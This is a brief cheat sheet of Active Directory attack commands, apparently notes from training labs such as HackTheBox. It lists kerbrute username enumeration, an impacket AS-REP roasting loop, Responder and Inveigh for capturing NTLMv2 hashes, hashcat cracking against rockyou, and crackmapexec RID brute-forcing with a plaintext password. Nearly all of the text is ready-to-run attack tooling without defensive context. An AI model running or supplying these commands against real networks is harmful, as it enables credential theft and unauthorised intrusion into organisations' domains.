Users Enumeration.
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
kerbrute userenum -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.236
for user in $(cat usernames); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 blackfield.local/$user | grep krb5asrep; done
grep -oP 'cn: \\K.*'
From Linux
sudo responder -I ens224
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
From Windows
Tool link.
Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
.\Inveigh.exe # We can quickly view unique captured hashes by typing > GET NTLMV2UNIQUE # We can type in the following and see which usernames we have collected. > GET NTLMV2USERNAMES
crackmapexec smb 10.10.10.149 -u 'hazard' -p 'stealth1agent' --rid-brute
Last updated 9 months ago
